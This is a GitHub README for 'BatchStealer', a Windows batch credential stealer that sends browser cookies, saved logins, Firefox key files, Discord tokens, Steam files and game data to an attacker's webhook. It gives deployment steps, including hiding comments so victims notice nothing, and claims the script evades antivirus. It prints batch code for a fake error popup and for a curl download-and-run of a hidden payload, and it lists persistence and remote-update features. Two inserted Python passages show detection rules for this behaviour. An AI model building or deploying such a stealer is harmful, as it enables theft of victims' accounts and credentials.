A batch script for taking information. A bit overdeveloped, and kind of useless.

Takaovi/BatchStealer

BatchStealer | BatchStealer Example

📜 A batch script for taking things and sending them to a webhook

My attempt at making a stealer with batch; it sucks. The script will not be updated anymore. If anything, a new one would be made, this time properly. Treat the current BatchStealer as a POC, not as a finished product/malware.

3.4.2021 < FUD (Virustotal)

Made with love in Finland

How to use

⚠️ Windows 10 build 17063, or later (cURL is included)

  1. Change the webhook to yours.
  2. Remove the fail-safes. ("goto xxx")
  3. Run the batch file.

❌ Get rid of the comments 📝

  • Do a regex search on notepad++, match ^::.*\n and replace with nothing.

⛔ Avoid

  • Just changing the webhook and doing nothing else.
    • If the batch file does nothing the user will open it to see what's wrong.

Features

💉 Steals

Almost everything is encrypted, I haven't had the patience to do that on a batch file

Full system information
  • OS Name & Version
  • Product ID
  • System Manufacturer
  • Processor(s)
  • BIOS Version
  • Time Zone
  • Total Physical Memory
  • Network Card(s)
  • And more...
Chrome
  • Cookies
  • History
  • Shortcuts
  • Bookmarks
  • Login Data
Opera
  • Cookies
  • History
  • Shortcuts
  • Bookmarks
  • Login Data
Vivaldi
  • Cookies
  • History
  • Shortcuts
  • Bookmarks
  • Login Data
Firefox
  • Logins
  • key3
  • key4
  • Cookies (Plain text!)
osu!
  • osu!.cfg
Discord
  • File containing a Token
  • Other various files
Steam
  • Logged in users (Username, email)
  • Hidden ssfn files
Minecraft
  • Launcher profiles and accounts
Growtopia
  • Save.dat
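
For defenders, the list above doubles as a watch list: a process other than the owning application reading these files is worth an alert. The following is an added example, not code from the repository; it assumes file-access audit records reduced to (process image, target path) pairs, and the directory fragments and owner process names are assumed default Windows locations.

```python
import ntpath

# File names as listed in the README for Chromium-based browsers.
CHROMIUM = {"cookies", "history", "shortcuts", "bookmarks", "login data"}
# (directory fragment, file names, owning process). Fragments and process names
# are assumed default Windows locations; the README gives only the file names.
STORES = [
    (r"\google\chrome\user data", CHROMIUM, "chrome.exe"),
    (r"\opera software", CHROMIUM, "opera.exe"),
    (r"\vivaldi\user data", CHROMIUM, "vivaldi.exe"),
    # On-disk names for the README's Logins / key3 / key4 / Cookies entries.
    (r"\mozilla\firefox\profiles",
     {"logins.json", "key3.db", "key4.db", "cookies.sqlite"}, "firefox.exe"),
]

def classify(image, target):
    """Return the owning process name if a different process touched a store file."""
    path = target.lower()
    name = ntpath.basename(path)
    for fragment, files, owner in STORES:
        if fragment in path and name in files:
            return None if ntpath.basename(image.lower()) == owner else owner
    return None

def foreign_access(events):
    """List (accessing process, expected owner, file) for every foreign access."""
    hits = []
    for image, target in events:
        owner = classify(image, target)
        if owner:
            hits.append((ntpath.basename(image), owner, ntpath.basename(target)))
    return hits

# Constructed audit records (process image, file opened); not real telemetry.
PROFILE = r"C:\Users\alice\AppData"
EVENTS = [
    (r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     PROFILE + r"\Local\Google\Chrome\User Data\Default\Login Data"),
    (r"C:\Windows\System32\cmd.exe",
     PROFILE + r"\Local\Google\Chrome\User Data\Default\Login Data"),
    (r"C:\Windows\System32\xcopy.exe",
     PROFILE + r"\Roaming\Mozilla\Firefox\Profiles\ab12cd34.default\key4.db"),
    (r"C:\Windows\System32\cmd.exe", r"C:\Users\alice\Documents\History"),
]

if __name__ == "__main__":
    for proc, owner, name in foreign_access(EVENTS):
        print(f"{proc} read {name} (expected {owner})")
```

Backup and endpoint-protection agents also read these files, so an allow-list of known images belongs in front of any alert built on this.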

Other manually addable features

Skip run by Task Scheduler

if not "%~dp0"=="%vpath%\" (
:: Your code not to get recurred
)

Fake error message

set "vpath="
...

:: FAKE ERROR MESSAGE | REMOVE GOTO IF YOU WANT IT TO DISPLAY
:: ----------------------------------------------------------
goto skipfakeerror
if not "%~dp0"=="%vpath%\" (
start /min /b mshta vbscript:Execute("Msgbox(""Bodytext""+vbCrLf+vbCrLf+""Anotherbody""),16,""Titletext"":window.close")
)
:skipfakeerror

...

Download & run payload

set "vpath="
set "webhook="

cd %vpath%
...

:: PAYLOAD - REMOVE GOTO IF YOU WANT THE SCRIPT TO DOWNLOAD AND RUN A FILE SOMEWHERE
:: ---------------------------------------------------------------------------------
goto skipcustomdownload
	set "customdownloadurl=https://external.ext/file.exe"
        set "customfilename=c.exe"
	curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```Downloading and starting a custom file from\n%customdownloadurl% to %vpath%\%customfilename%```\"}" %webhook%
	IF EXIST "%customfilename%" GOTO waitloop4
	curl --silent -L --fail "%customdownloadurl%" -o "%customfilename%"
	>NUL attrib "%vpath%\%customfilename%" +h
	:waitloop4
	IF EXIST "%customfilename%" GOTO waitloopend4
	timeout /t 5 /nobreak > NUL
	:waitloopend4
	2> NUL start "%customfilename%"
:skipcustomdownload

...
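
The snippets above leave recognizable child-process command lines: mshta running a VBScript Msgbox, curl posting JSON, curl saving an .exe, and attrib +h. As an added detection example, not part of the repository, the following correlates those patterns per parent script over constructed process-creation records; the record shape, paths, script names and URLs are assumptions.

```python
import re
from collections import defaultdict

# Patterns derived from the command lines in the README snippets above.
RULES = {
    "mshta_vbscript_msgbox": re.compile(
        r'\bmshta(\.exe)?\b.*vbscript:execute\(.*msgbox', re.I),
    "curl_json_post": re.compile(
        r'\bcurl(\.exe)?\b(?=.*-X\s+POST)(?=.*content-type:\s*application/json)', re.I),
    "curl_fetch_exe": re.compile(
        r'\bcurl(\.exe)?\b.*\s(-o|--output)\s+"?[^"\s]+\.exe\b', re.I),
    "attrib_hide": re.compile(r'\battrib(\.exe)?\b.*\s\+h\b', re.I),
}

def correlate(events, threshold=2):
    """Group rule hits by parent; report parents with >= threshold distinct rules."""
    hits = defaultdict(set)
    for parent, cmdline in events:
        for name, rx in RULES.items():
            if rx.search(cmdline):
                hits[parent].add(name)
    return {p: sorted(r) for p, r in hits.items() if len(r) >= threshold}

# Constructed process-creation records: (parent command line, child command line).
# Paths, script names and URLs are placeholders, not values from the repository.
SUSPECT = r'cmd.exe /c C:\Users\alice\Downloads\update.bat'
BENIGN = r'cmd.exe /c C:\tools\healthcheck.bat'
EVENTS = [
    (SUSPECT, r'mshta vbscript:Execute("Msgbox(""Bodytext""),16,""Titletext"":window.close")'),
    (SUSPECT, r'curl --silent -i -H "Content-Type:application/json" -X POST '
              r'--data "{\"content\": \"x\"}" https://webhook.example/hook'),
    (SUSPECT, r'curl --silent -L --fail "https://external.ext/file.exe" -o "c.exe"'),
    (SUSPECT, r'attrib "C:\ProgramData\c.exe" +h'),
    # A legitimate script that also posts JSON with curl: one rule, below threshold.
    (BENIGN, r'curl -X POST -H "Content-Type: application/json" --data "{}" '
             r'https://api.example/health'),
    (BENIGN, r'attrib +r C:\tools\notes.txt'),
]

if __name__ == "__main__":
    for parent, rules in correlate(EVENTS).items():
        print(parent, "->", ", ".join(rules))
```

Requiring two or more distinct rules per parent keeps ordinary curl use from alerting on its own.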

📑 Other features

  • Delete itself after execution

  • Add itself to Task Scheduler (CMD window will be invisible when executed)

    • Will make files to C:\ProgramData by default. (Hidden)
  • Push updates to infected machine(s) (Beta, expect bugs and crashes)

    • Make sure to have a working batch file's source on the link, it will replace everything.
    • Ability to target specific users (Check username)
  • Take screenshot

Included on the Automatic Builder

  • Add garbage code (Confuse/Fill)

  • Obfuscate (not made yet)

Todo

  • DNS poisoning
    • Simple edit of the hosts file (Would require administrator)
  • Other interesting stuff...

💡 Support

  • If you want to support the project do a pull request.
    • The pull request could be a new steal etc.

㊙️ Obfuscation (Read carefully)

  • You can try this
    • Recurring does not work with the obfuscation. (Script exits when it reaches it)
    • "Start as administrator" will make a visible error message on the CMD box.

Thanks

Legal

None of the authors, contributors, or anyone else connected with this open source project, in any way whatsoever, can be responsible for your use of the information or the application contained in or linked from this repository.

Under Section 107 of the Copyright Act 1976, allowance is made for "fair use" for purposes such as criticism, comment, news reporting, teaching, scholarship and research. Fair use is a use permitted by copyright statute that might otherwise be infringing. Non-profit, educational or personal use tips the balance in favor of fair use.

If you don't agree with any of our disclaimers above, do not read the code or download anything from our repository as you have no permission to read and explore our repository until you agree.